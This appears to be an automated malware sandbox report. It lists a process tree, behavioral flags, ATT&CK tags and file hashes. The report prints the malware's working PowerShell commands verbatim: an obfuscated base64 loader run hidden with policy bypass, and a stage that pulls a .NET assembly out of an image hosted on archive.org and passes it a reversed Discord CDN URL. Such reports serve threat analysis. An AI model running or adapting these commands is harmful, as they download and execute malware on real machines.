␆ △ ╓G0⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓n⛜ ⨅ ␆ △ ╓Ck⛜ ⨅ ␆ △ ╓Ow⛜ ⨅ ␆ △ ╓k⛜ ⨅ ␆ △ ╓G0⛜ ⨅ ␆ △ ╓ZQB0⛜ ⨅ ␆ △ ╓Gg⛜ ⨅ ␆ △ ╓bwBk⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓PQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓B5⛜ ⨅ ␆ △ ╓H⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓u⛜ ⨅ ␆ △ ╓Ec⛜ ⨅ ␆ △ ╓ZQB0⛜ ⨅ ␆ △ ╓E0⛜ ⨅ ␆ △ ╓ZQB0⛜ ⨅ ␆ △ ╓Gg⛜ ⨅ ␆ △ ╓bwBk⛜ ⨅ ␆ △ ╓Cg⛜ ⨅ ␆ △ ╓JwBW⛜ ⨅ ␆ △ ╓EE⛜ ⨅ ␆ △ ╓SQ⛜ ⨅ ␆ △ ╓n⛜ ⨅ ␆ △ ╓Ck⛜ ⨅ ␆ △ ╓LgBJ⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓dgBv⛜ ⨅ ␆ △ ╓Gs⛜ ⨅ ␆ △ ╓ZQ⛜ ⨅ ␆ △ ╓o⛜ ⨅ ␆ △ ╓CQ⛜ ⨅ ␆ △ ╓bgB1⛜ ⨅ ␆ △ ╓Gw⛜ ⨅ ␆ △ ╓b⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓s⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓WwBv⛜ ⨅ ␆ △ ╓GI⛜ ⨅ ␆ △ ╓agBl⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bb⛜ ⨅ ␆ △ ╓F0⛜ ⨅ ␆ △ ╓XQ⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓Cg⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓m⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓NQ⛜ ⨅ ␆ △ ╓0⛜ ⨅ ␆ △ ╓DM⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓4⛜ ⨅ ␆ △ ╓DE⛜ ⨅ ␆ △ ╓Zg⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓Yg⛜ ⨅ ␆ △ ╓w⛜ ⨅ ␆ △ ╓GI⛜ ⨅ ␆ △ ╓N⛜ ⨅ ␆ △ ╓Bi⛜ ⨅ ␆ △ ╓DE⛜ ⨅ ␆ △ ╓YQ⛜ ⨅ ␆ △ ╓4⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Mw⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓YgBk⛜ ⨅ ␆ △ ╓DM⛜ ⨅ ␆ △ ╓O⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓DQ⛜ ⨅ ␆ △ ╓YgBi⛜ ⨅ ␆ △ ╓GQ⛜ ⨅ ␆ △ ╓MQ⛜ ⨅ ␆ △ ╓w⛜ ⨅ ␆ △ ╓DU⛜ ⨅ ␆ △ ╓YQ⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓Dg⛜ ⨅ ␆ △ ╓NwBh⛜ ⨅ ␆ △ ╓DI⛜ ⨅ ␆ △ ╓NQBl⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓GY⛜ ⨅ ␆ △ ╓ZQBk⛜ ⨅ ␆ △ ╓Dk⛜ ⨅ ␆ △ ╓M⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓DQ⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓OQBj⛜ ⨅ ␆ △ ╓DE⛜ ⨅ ␆ △ ╓PQBt⛜ ⨅ ␆ △ ╓Gg⛜ ⨅ ␆ △ ╓Jg⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓DI⛜ ⨅ ␆ △ ╓Yg⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓GY⛜ ⨅ ␆ △ ╓Yw⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓PQBz⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓Jg⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Yw⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓PQB4⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓PwB0⛜ ⨅ ␆ △ ╓Hg⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓u⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓awBh⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓Uw⛜ ⨅ ␆ △ ╓v⛜ ⨅ ␆ △ ╓D⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓DI⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓2⛜ ⨅ ␆ △ ╓DY⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓Dc⛜ ⨅ ␆ △ ╓Mw⛜ ⨅ ␆ △ ╓4⛜ ⨅ ␆ △ ╓DM⛜ ⨅ ␆ △ ╓Mw⛜ ⨅ ␆ △ ╓z⛜ ⨅ ␆ △ ╓Dg⛜ ⨅ ␆ △ ╓Nw⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓DE⛜ ⨅ ␆ △ ╓Lw⛜ ⨅ ␆ △ ╓w⛜ ⨅ ␆ △ ╓DI⛜ ⨅ ␆ △ ╓NQ⛜ ⨅ ␆ △ ╓1⛜ ⨅ ␆ △ ╓Dg⛜ ⨅ ␆ △ ╓Ng⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓Dc⛜ ⨅ ␆ △ ╓NQ⛜ ⨅ ␆ △ ╓y⛜ ⨅ ␆ △ ╓Dg⛜ ⨅ ␆ △ ╓Ng⛜ ⨅ ␆ △ ╓5⛜ ⨅ ␆ △ ╓DI⛜ ⨅ ␆ △ ╓Mw⛜ ⨅ ␆ △ ╓4⛜ ⨅ ␆ △ ╓Dc⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓cwB0⛜ ⨅ ␆ △ ╓G4⛜ ⨅ ␆ △ ╓ZQBt⛜ ⨅ ␆ △ ╓Gg⛜ ⨅ ␆ △ ╓YwBh⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bh⛜ ⨅ ␆ △ ╓C8⛜ ⨅ ␆ △ ╓bQBv⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓LgBw⛜ ⨅ ␆ △ ╓H⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓YQBk⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓bwBj⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓aQBk⛜ ⨅ ␆ △ ╓C4⛜ ⨅ ␆ △ ╓bgBk⛜ ⨅ ␆ △ ╓GM⛜ ⨅ ␆ △ ╓Lw⛜ ⨅ ␆ △ ╓v⛜ ⨅ ␆ △ ╓Do⛜ ⨅ ␆ △ ╓cwBw⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓d⛜ ⨅ ␆ △ ╓Bo⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓s⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓Jw⛜ ⨅ ␆ △ ╓x⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓I⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓s⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓JwBD⛜ ⨅ ␆ △ ╓Do⛜ ⨅ ␆ △ ╓X⛜ ⨅ ␆ △ ╓BQ⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓bwBn⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓YQBt⛜ ⨅ ␆ △ ╓EQ⛜ ⨅ ␆ △ ╓YQB0⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓X⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓n⛜ ⨅ ␆ △ ╓C⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓L⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓g⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓c⛜ ⨅ ␆ △ ╓Bl⛜ ⨅ ␆ △ ╓HM⛜ ⨅ ␆ △ ╓cwBl⛜ ⨅ ␆ △ ╓Gc⛜ ⨅ ␆ △ ╓dQBl⛜ ⨅ ␆ △ ╓Gk⛜ ⨅ ␆ △ ╓cgBv⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓L⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓n⛜ ⨅ ␆ △ ╓EE⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bk⛜ ⨅ ␆ △ ╓Ek⛜ ⨅ ␆ △ ╓bgBQ⛜ ⨅ ␆ △ ╓HI⛜ ⨅ ␆ △ ╓bwBj⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓cwBz⛜ ⨅ ␆ △ ╓DM⛜ ⨅ ␆ △ ╓Mg⛜ ⨅ ␆ △ ╓n⛜ ⨅ ␆ △ ╓Cw⛜ ⨅ ␆ △ ╓JwBk⛜ ⨅ ␆ △ ╓GU⛜ ⨅ ␆ △ ╓cwBh⛜ ⨅ ␆ △ ╓HQ⛜ ⨅ ␆ △ ╓aQB2⛜ ⨅ ␆ △ ╓GE⛜ ⨅ ␆ △ ╓Z⛜ ⨅ ␆ △ ╓Bv⛜ ⨅ ␆ △ ╓Cc⛜ ⨅ ␆ △ ╓KQ⛜ ⨅ ␆ △ ╓p⛜ ⨅ ␆ △ ╓⛜ ⨅ ␆ △ ╓==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⛜ ⨅ ␆ △ ╓','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0543281f1eb0b4b1a8a310bd381ad94bbd105a287a25ec79a72fed902422e9c1=mh&92b1fc66=si&9ac60d66=xe?txt.ekanS/0722766227383338721/0255869752869238721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'pessegueiro','AddInProcess32','desativado'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5aaf71b11f82dc648b2af6279a6c52a26
SHA1cf2662f10584844f4d3922c2f7c5c6e0d89f12cb
SHA256e7dfe419f2f3eb1389fed74765972e7fbfbe707541c75ceee3d6bac3448478cd
SHA5129eff8297043f17a6d2e5075b3fe6dd6d739060280847ef72823a144f6bafefc2a4de5b36832e3beed19dac0b1120b204ea8add2b5374adb702c0ba28181c5947